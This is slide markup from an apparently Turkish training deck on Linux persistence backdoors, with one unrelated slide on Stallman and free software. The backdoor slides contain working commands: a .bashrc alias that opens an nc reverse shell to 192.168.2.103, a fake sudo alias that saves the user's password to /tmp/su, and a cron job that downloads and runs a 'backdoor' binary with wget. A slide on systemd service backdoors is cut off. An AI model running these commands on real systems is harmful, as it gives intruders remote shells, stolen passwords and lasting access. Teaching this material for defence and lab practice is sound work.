      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p84"/>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~bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasının kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;662;p84"/>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66" name="Shape 666"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p8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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor: .bashrc - alias komutunun kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="679925"/>
            <a:ext cx="4170600" cy="30990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Alias, bir komuta alternatif bir ad atanabilen ve genellikle kısaltılmış bir şekilde kullanılan bir özelliktir.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Saldırganlar,, bu özelliği kullanarak kullanıcıların alias'larına arka kapı ekleyebilir.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Aşağıda, cd komutu için bir alias kullanarak reverse shell formunda bir arka kapı oluşturuldu.</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Bu arka kapı, belirli bir IP adresi (192.168.2.103) ve port numarası (9001) üzerinden bir ters kabuk (reverse shell) bağlantısı kurar.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Google Shape;669;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="3914775"/>
            <a:ext cx="4170600" cy="7389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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>root@pinkys-palace:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>alias</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="D69D85"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>'$(nc 192.168.2.103 9001 -e /bin/bash&amp;); cd'</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="D69D85"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="D69D85"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="Google Shape;670;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582150" y="3914775"/>
            <a:ext cx="4296000" cy="7158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50">
                <a:solidFill>
                  <a:srgbClr val="E9950C"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>alias</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> sudo=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'echo -n "[sudo] password for $USER: " &amp;&amp; read -r password &amp;&amp; echo "$password" &gt;/tmp/su &amp;&amp; /usr/bin/sudo $@'</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582000" y="679925"/>
            <a:ext cx="4296000" cy="30990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Aşağıda, sudo komutuna bir takma ad (alias) ekleyerek, kullanıcının sudo için şifresini girmesini bekleyen sahte bir sudo girişi oluşturur.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Kullanıcıya "[sudo] password for $USER: " şeklinde sahte bir sudo parola girişi mesajı gösterir.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Kullanıcının girdiği şifreyi okur ve /tmp/su dosyasına yazıp kaydeder.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Ardından, /usr/bin/sudo komutunu asıl parametreleriyle birlikte çağırır.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p85"/>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3"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2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 name="Shape 79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p1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Richard M. Stallman: Açık Kaynak vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Özgür Yazılım</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505550" y="666450"/>
            <a:ext cx="5522100" cy="4127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Char char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sert açık kaynak destekçisi, aktivist, yazar, developer</a:t>
            </a:r>
            <a:endParaRPr>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US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GNU geliştiricisi, Free Software Foundation kurucusu</a:t>
            </a:r>
            <a:endParaRPr>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US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Açık kaynak kodlu bir yazılımın üzerinde birkaç değişiklik yapılıp kaynak kodlarının kapatılarak ticari bir yazılıma dönüştürülmesi: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dünyadaki tüm geliştirilen yazılımların zamanla kapalı kaynak haline gelmesine neden olabilir.</a:t>
            </a:r>
            <a:endParaRPr>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US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GNU lisansını önerdi</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Peki para nasıl kazanacağız?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neden bedava bir ürüne para vermek isteyesiniz?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔗 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Neden Açık Kaynak Özgür Yazılımın Noktasını Kaçırıyor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="Google Shape;82;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204925" y="666450"/>
            <a:ext cx="3036650" cy="3926925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p14"/>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FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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6" name="Shape 676"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="677" name="Google Shape;677;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="23919" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="219200" y="975675"/>
            <a:ext cx="9005476" cy="3261275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;p86"/>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.bashrc - alias komutunun kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p86"/>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3" name="Shape 683"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p87"/>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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron jobs</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Google Shape;685;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="679925"/>
            <a:ext cx="4170600" cy="39507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Cron, Linux/UNIX benzeri işletim sistemlerinde, Görev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Zamanlayıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> (Task Scheduler) Windows'taki gibi belirli bir işi veya görevi düzenli aralıklarla gerçekleştirmek için kullanılan bir özelliktir.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Yandaki görev, her dakika bir kere olmak üzere, saldırganın makinesinden 'backdoor' adlı kötü amaçlı bir ikili dosyayı indirir. Daha sonra, bu backdoor dosyasını çalıştırır.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Görev, /tmp dizinine giderek 'backdoor' adlı kötü amaçlı dosyayı saldırganın makinesinden indirir.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>İndirilen dosyaya yürütme izni verilir ve ardından bu dosya çalıştırılır.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Google Shape;686;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494600" y="753875"/>
            <a:ext cx="4494600" cy="1242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US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>root@pinkys-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>palace</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:~# echo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'* * * * * root cd /tmp; wget 192.168.2.103/backdoor &amp;&amp; chmod +x backdoor &amp;&amp; ./backdoor'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cron.d/backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p87"/>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3"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1" name="Shape 691"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="692" name="Google Shape;692;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="200050" y="658625"/>
            <a:ext cx="7848299" cy="4172421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p88"/>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cron jobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p88"/>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98" name="Shape 698"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Google Shape;699;p8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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor: as a service</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Google Shape;700;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="1126025"/>
            <a:ext cx="8598000" cy="1200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highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[Service]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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DF3079"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=simple</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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DF3079"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
